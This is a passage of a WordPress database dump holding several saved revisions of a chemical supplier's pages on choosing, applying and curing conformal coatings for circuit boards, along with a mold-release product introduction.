<li><strong>SILICONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:26:36', '2016-10-10 19:26:36', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2488, 2, '2017-08-09 22:59:19', '2017-08-09 22:59:19', '<h2><strong>How Miller-Stephenson can help you choose the right Conformal Coating</strong></h2>\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\n<h2><strong>What are Conformal Coatings?</strong></h2>\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\n\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\n<ul>\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\n 	<li>Minimal effect on component weight</li>\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\n 	<li>Minimize environmental stress on a PCB assembly</li>\n</ul>\n<h2><strong>Types of Conformal Coating:</strong></h2>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\n</ul>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\n</ul>\nEqually as important as choosing the correct resin is proper application and cure of the coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\n<h2><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h2>\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\n<ol>\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\n</ol>\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\n\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\n<ul>\n 	<li>Simple application- Convenient aerosol or bulk</li>\n 	<li>Specialized formulas to provide uniform, thin films</li>\n 	<li>Easy removal, repair and replacement</li>\n 	<li>100% non-flammable; low odor formulations</li>\n 	<li>Superior Protection against thermal and mechanical shock</li>\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\n</ul>\n[ux_product_categories ids="29,28,27,30" number="10"]\n\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'inherit', 'closed', 'closed', '', '2474-autosave-v1', '', '', '2017-08-09 22:59:19', '2017-08-09 22:59:19', '', 2474, 'https://www.miller-stephenson.com/2474-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2489, 2, '2016-10-10 19:45:22', '2016-10-10 19:45:22', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:45:22', '2016-10-10 19:45:22', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2490, 3, '2016-10-10 20:01:12', '2016-10-10 20:01:12', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\r\n\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-10-10 20:01:12', '2016-10-10 20:01:12', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2491, 3, '2016-10-10 20:05:01', '2016-10-10 20:05:01', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers. Miller-Stephenson has spent years improving and tailoring our mold release agents and specifically our ReleaSys release agent to deliver the highest value proposition by increasing application efficiency, reducing manufacturing downtime, and enhancing finished part quality and consistency.\r\n\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-10-10 20:05:01', '2016-10-10 20:05:01', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2492, 3, '2016-10-10 20:05:43', '2016-10-10 20:05:43', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-10-10 20:05:43', '2016-10-10 20:05:43', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2493, 3, '2016-10-11 13:18:30', '2016-10-11 13:18:30', '', 'Acrylic Conformal Coating', '', 'inherit', 'closed', 'closed', '', 'ms-475c_477c-3', '', '', '2016-10-11 13:18:45', '2016-10-11 13:18:45', '', 621, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-475C_477C-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (2494, 2, '2016-10-11 13:45:34', '2016-10-11 13:45:34', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-11 13:45:34', '2016-10-11 13:45:34', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2495, 3, '2016-11-24 03:38:19', '2016-11-24 03:38:19', 'Miller-Stepheson Acrylic Conformal Coating MIL-SPEC MS-477C offer superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-475C will cover 6.4 sq. ft. at a 2 mil. thickness per 1- aerosol can.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\n\nAcrylic Conformal Coating MIL-SPEC are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\n\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-477C', 'Miller-Stephesons’ Acrylic Conformal Coating offers superior toughness and abrasion resistance, excellent dielectric properties, fungal resistance, and moisture and environmental protection. Our formulation is 100% non-flammable. The acrylic resin meets the requirements of MIL-I-46058C Type AR. Printed circuit boards covered with acrylic coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. MS-477C, the bulk liquid version will cover 91 sq. ft. per gallon at a 2 mil. thickness when applied via dip, brush, or spray\n\n&nbsp;', 'inherit', 'closed', 'closed', '', '637-autosave-v1', '', '', '2016-11-24 03:38:19', '2016-11-24 03:38:19', '', 637, 'https://www.miller-stephenson.com/637-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2496, 0, '2016-10-11 14:19:24', '2016-10-11 14:19:24', '', '', '', 'publish', 'closed', 'closed', '', '2496', '', '', '2016-10-11 14:19:24', '2016-10-11 14:19:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/2496/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2497, 3, '2016-10-11 14:43:02', '2016-10-11 14:43:02', 'Miller-Stephenson\'s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\n\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely 